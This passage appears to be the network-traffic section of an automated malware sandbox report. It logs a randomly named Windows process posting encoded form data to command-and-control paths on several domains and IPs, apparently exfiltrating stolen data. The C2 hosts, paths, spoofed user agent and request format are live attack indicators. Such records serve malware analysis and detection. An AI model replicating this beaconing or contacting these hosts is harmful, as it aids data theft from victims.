                              Data Raw: 62 58 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 42 65 6c 6f 46 53 4d 61 56 2f 47 6e 32 48 4a 2b 75 6c 45 70 41 52 39 4e 61 78 32 4f 66 43 47 58 4f 6e 62 6d 6a 66 42 70 36 6e 37 6d 34 6a 79 79 4d 70 66 56 2f 63 71 37 48 76 2b 61 44 59 47 54 63 70 54 56 57 61 39 74 64 49 51 5a 59 76 46 63 30 79 55 69 33 4b 65 68 52 71 55 2f 34 7a 51 6e 55 43 35 76 4e 56 55 54 56 67 37 75 41 37 4d 33 45 54 56 56 43 74 42 6a 50 69 72 75 70 38 53 56 4c 6a 58 42 48 78 51 59 78 38 68 44 48 74 62 64 58 2b 35 5a 37 42 76 44 5a 53 64 32 38 44 59 31 62 41 32 70 54 33 2b 39 63 52 6d 33 57 78 6d 53 38 35 61 30 76 53 58 6d 4c 69 55 3d
                              Data Ascii: bX=ezGJx9beP/VwBeloFSMaV/Gn2HJ+ulEpAR9Nax2OfCGXOnbmjfBp6n7m4jyyMpfV/cq7Hv+aDYGTcpTVWa9tdIQZYvFc0yUi3KehRqU/4zQnUC5vNVUTVg7uA7M3ETVVCtBjPirup8SVLjXBHxQYx8hDHtbdX+5Z7BvDZSd28DY1bA2pT3+9cRm3WxmS85a0vSXmLiU=


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              10 | 192.168.2.5 | 58655 | 85.159.66.93 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:37.478934050 CEST | 768 | OUT | POST /k2vl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.golbasi-nakliyat.xyz
                              Origin: http://www.golbasi-nakliyat.xyz
                              Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 69 58 4e 46 44 6d 69 65 42 70 35 6e 37 6d 71 44 79 33 52 35 66 65 2f 63 32 7a 48 76 79 61 44 59 53 54 63 6f 50 56 57 70 6c 71 64 59 51 62 51 50 46 4e 77 79 55 69 33 4b 65 68 52 71 51 47 34 7a 59 6e 55 7a 4a 76 50 33 77 55 4c 51 37 78 4a 62 4d 33 4f 7a 56 52 43 74 41 32 50 6d 72 55 70 36 57 56 4c 69 6e 42 48 67 51 62 2b 38 68 46 61 39 61 35 61 63 30 48 2b 77 33 34 52 78 49 7a 6c 78 63 75 58 57 62 44 4a 56 32 56 50 78 4b 50 47 69 75 6c 74 4a 37 64 31 78 48 57 56 31 41 67 6e 39 7a 77 42 41 75 4e 51 59 42 78 33 45 58 43 75 57 4d 58
                              Data Ascii: bX=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxiXNFDmieBp5n7mqDy3R5fe/c2zHvyaDYSTcoPVWplqdYQbQPFNwyUi3KehRqQG4zYnUzJvP3wULQ7xJbM3OzVRCtA2PmrUp6WVLinBHgQb+8hFa9a5ac0H+w34RxIzlxcuXWbDJV2VPxKPGiultJ7d1xHWV1Agn9zwBAuNQYBx3EXCuWMX


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              11 | 192.168.2.5 | 58656 | 85.159.66.93 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:40.133606911 CEST | 1785 | OUT | POST /k2vl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.golbasi-nakliyat.xyz
                              Origin: http://www.golbasi-nakliyat.xyz
                              Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 71 58 4e 77 58 6d 69 39 35 70 34 6e 37 6d 78 44 79 32 52 35 66 44 2f 63 75 33 48 76 4f 77 44 62 71 54 4f 61 72 56 42 4d 52 71 53 59 51 62 53 50 46 64 30 79 55 53 33 4b 4f 74 52 71 41 47 34 7a 59 6e 55 77 52 76 49 6c 55 55 4a 51 37 75 41 37 4d 42 45 54 56 31 43 74 6f 6d 50 6d 76 45 6f 4b 32 56 4c 43 33 42 55 69 34 62 7a 38 68 48 5a 39 61 68 61 63 34 6d 2b 77 62 46 52 79 55 4a 6c 7a 4d 75 55 53 79 2b 56 6b 71 66 63 43 43 5a 47 77 76 44 7a 76 50 34 33 48 65 69 66 6b 6b 69 6c 38 54 65 58 67 71 76 5a 62 30 6d 72 79 6a 53 68 54 56 61 57 2b 2b 4f 67 36 56 6b 44 56 33 66 65 59 32 6f 6d 72 73 54 49 54 45 6a 52 74 34 43 34 52 46 67 43 64 55 2b 6a 2f 2b 54 6b 31 79 43 61 38 62 47 2b 46 6c 74 51 4b 58 46 53 57 43 35 6b 55 38 42 4d 4d 67 65 76 43 77 6f 51 7a 32 77 67 41 70 76 76 6f 38 41 6b 41 49 38 7a 36 47 38 38 50 4b 4e 76 66 48 53 49 39 55 55 69 55 77 68 77 67 52 41 72 75 73 [TRUNCATED]
                              Data Ascii: bX=[TRUNCATED]


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              12 | 192.168.2.5 | 58657 | 85.159.66.93 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:42.727197886 CEST | 470 | OUT | GET /k2vl/?bX=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.golbasi-nakliyat.xyz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:30:43.414175987 CEST | 225 | IN | HTTP/1.1 404 Not Found
                              Server: nginx/1.14.1
                              Date: Mon, 16 Sep 2024 07:30:43 GMT
                              Content-Length: 0
                              Connection: close
                              X-Rate-Limit-Limit: 5s
                              X-Rate-Limit-Remaining: 19
                              X-Rate-Limit-Reset: 2024-09-16T07:30:48.3042146Z


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              13 | 192.168.2.5 | 58658 | 185.173.111.76 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:48.493576050 CEST | 742 | OUT | POST /lwt6/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mfgamecompany.shop
                              Origin: http://www.mfgamecompany.shop
                              Referer: http://www.mfgamecompany.shop/lwt6/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 4a 4f 41 5a 7a 55 76 67 78 4f 57 53 34 52 79 55 31 48 59 6f 30 2f 48 52 50 31 38 52 39 34 68 45 6a 51 63 37 61 6c 46 7a 54 2b 72 51 35 49 62 6b 53 31 42 45 2f 36 76 6f 44 4f 61 46 44 33 32 6b 48 2f 56 37 53 2b 6c 37 46 57 34 30 34 6d 44 31 44 66 45 54 37 6b 63 44 66 4d 69 4f 42 51 35 50 4c 6e 4c 4c 52 36 39 67 4f 76 70 6d 76 77 53 75 66 68 71 62 35 6e 4c 7a 4b 75 6f 33 42 77 47 31 4d 64 6c 68 44 36 6a 61 55 62 50 35 77 5a 57 6b 54 47 4f 57 76 6b 31 64 76 4e 2f 67 52 2f 73 68 7a 64 36 54 69 61 58 35 48 77 39 57 4c 55 2b 43 30 41 4b 4b 5a 52 7a 5a 4f 51 6b 3d
                              Data Ascii: bX=u91ZDexvlNKHJOAZzUvgxOWS4RyU1HYo0/HRP18R94hEjQc7alFzT+rQ5IbkS1BE/6voDOaFD32kH/V7S+l7FW404mD1DfET7kcDfMiOBQ5PLnLLR69gOvpmvwSufhqb5nLzKuo3BwG1MdlhD6jaUbP5wZWkTGOWvk1dvN/gR/shzd6TiaX5Hw9WLU+C0AKKZRzZOQk=
                              Sep 16, 2024 09:30:49.151998997 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                              Connection: close
                              content-type: text/html
                              content-length: 795
                              date: Mon, 16 Sep 2024 07:30:49 GMT
                              server: LiteSpeed
                              location: https://www.mfgamecompany.shop/lwt6/
                              platform: hostinger
                              panel: hpanel
                              content-security-policy: upgrade-insecure-requests
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              14 | 192.168.2.5 | 58659 | 185.173.111.76 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:51.032973051 CEST | 762 | OUT | POST /lwt6/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mfgamecompany.shop
                              Origin: http://www.mfgamecompany.shop
                              Referer: http://www.mfgamecompany.shop/lwt6/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 56 45 67 31 34 37 62 68 5a 7a 47 2b 72 51 68 34 61 75 57 31 42 4c 2f 36 71 66 44 4d 65 46 44 7a 65 6b 48 39 4e 37 54 4a 35 30 46 47 34 32 78 47 44 33 4a 2f 45 54 37 6b 63 44 66 4e 48 72 42 51 68 50 4c 58 37 4c 52 59 56 6a 49 66 70 6c 6d 51 53 75 62 68 71 66 35 6e 4c 52 4b 75 59 52 42 31 61 31 4d 63 56 68 43 76 58 64 64 62 4f 77 74 4a 58 6e 64 48 6e 6c 69 57 35 73 73 72 71 2b 43 2f 73 39 79 72 58 35 34 34 66 52 55 51 52 75 62 48 32 31 6c 77 72 6a 44 79 6a 70 51 48 78 5a 78 39 79 41 43 4b 62 56 64 66 6b 4b 4f 76 53 43 54 62 32 6c
                              Data Ascii: bX=u91ZDexvlNKHPq8ZyzDgmeWR9RyUv3Zv0+7RPxkB+LVEg147bhZzG+rQh4auW1BL/6qfDMeFDzekH9N7TJ50FG42xGD3J/ET7kcDfNHrBQhPLX7LRYVjIfplmQSubhqf5nLRKuYRB1a1McVhCvXddbOwtJXndHnliW5ssrq+C/s9yrX544fRUQRubH21lwrjDyjpQHxZx9yACKbVdfkKOvSCTb2l
                              Sep 16, 2024 09:30:51.696297884 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                              Connection: close
                              content-type: text/html
                              content-length: 795
                              date: Mon, 16 Sep 2024 07:30:51 GMT
                              server: LiteSpeed
                              location: https://www.mfgamecompany.shop/lwt6/
                              platform: hostinger
                              panel: hpanel
                              content-security-policy: upgrade-insecure-requests
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              15 | 192.168.2.5 | 58660 | 185.173.111.76 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:53.587518930 CEST | 1779 | OUT | POST /lwt6/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.mfgamecompany.shop
                              Origin: http://www.mfgamecompany.shop
                              Referer: http://www.mfgamecompany.shop/lwt6/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 4e 45 6a 48 77 37 61 47 74 7a 55 4f 72 51 2f 49 61 76 57 31 42 73 2f 2b 47 54 44 4d 43 2f 44 78 6d 6b 47 65 46 37 43 4c 52 30 51 32 34 32 75 57 44 30 44 66 45 61 37 6b 4e 4b 66 4d 33 72 42 51 68 50 4c 52 66 4c 58 4b 39 6a 54 66 70 6d 76 77 53 71 66 68 71 37 35 6b 36 75 4b 76 73 6e 43 42 57 31 56 38 46 68 42 5a 4c 64 41 72 4f 79 75 4a 58 46 64 48 37 36 69 57 6b 56 73 72 32 59 43 39 73 39 7a 73 69 74 73 62 44 61 42 51 78 61 54 6c 65 33 34 48 50 6e 49 51 2f 6c 53 56 56 74 30 73 6d 55 45 64 7a 68 62 75 39 38 4e 35 32 30 43 66 4b 70 42 4a 36 75 43 30 7a 36 62 6a 50 61 42 7a 4d 46 46 79 69 77 6b 50 67 4b 37 58 4a 2f 4e 56 74 65 55 6f 34 4a 49 56 74 58 6e 45 63 36 51 6b 6e 77 75 62 53 30 35 71 6b 4e 34 63 67 37 51 53 77 38 6b 72 32 33 67 39 58 47 2f 33 65 44 76 34 65 45 75 57 31 63 34 47 43 2f 47 31 6a 32 74 31 52 71 39 66 42 65 2f 73 45 32 51 69 36 5a 4d 2b 72 67 48 47 4e [TRUNCATED]
                              Data Ascii: bX=[TRUNCATED]
                              Sep 16, 2024 09:30:54.238173008 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                              Connection: close
                              content-type: text/html
                              content-length: 795
                              date: Mon, 16 Sep 2024 07:30:54 GMT
                              server: LiteSpeed
                              location: https://www.mfgamecompany.shop/lwt6/
                              platform: hostinger
                              panel: hpanel
                              content-security-policy: upgrade-insecure-requests
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              16 | 192.168.2.5 | 58661 | 185.173.111.76 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:56.139600992 CEST | 468 | OUT | GET /lwt6/?bX=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.mfgamecompany.shop
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:30:56.798033953 CEST | 1233 | IN | HTTP/1.1 301 Moved Permanently
                              Connection: close
                              content-type: text/html
                              content-length: 795
                              date: Mon, 16 Sep 2024 07:30:56 GMT
                              server: LiteSpeed
                              location: https://www.mfgamecompany.shop/lwt6/?bX=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==&RFRd_=tFLD
                              platform: hostinger
                              panel: hpanel
                              content-security-policy: upgrade-insecure-requests
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              17 | 192.168.2.5 | 58662 | 203.161.43.228 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:31:02.117590904 CEST | 718 | OUT | POST /ftr3/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.quilo.life
                              Origin: http://www.quilo.life
                              Referer: http://www.quilo.life/ftr3/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 56 66 6b 73 57 6f 41 47 67 6b 63 35 71 79 78 75 33 6d 4e 61 74 50 4e 36 44 6f 79 51 35 52 47 30 6c 69 62 66 35 42 30 41 50 32 51 63 51 43 54 6e 53 6b 53 4f 69 6e 51 68 6f 65 51 76 65 4e 4f 6c 5a 42 35 56 34 64 61 70 2f 65 42 62 4a 36 4b 5a 31 4d 6b 33 31 75 47 32 47 76 67 51 61 4e 2b 76 71 79 64 54 6d 39 2f 7a 66 35 76 74 39 47 31 35 6b 30 53 57 4c 6c 63 59 41 46 58 4f 6d 76 52 6a 79 57 32 68 57 36 49 50 4b 71 35 37 44 44 66 52 31 4d 33 2f 79 2b 75 4d 54 58 52 42 62 70 63 6c 30 72 36 43 75 48 66 70 6a 43 41 50 34 65 74 4e 64 64 44 47 4f 6c 48 72 59 79 59 3d
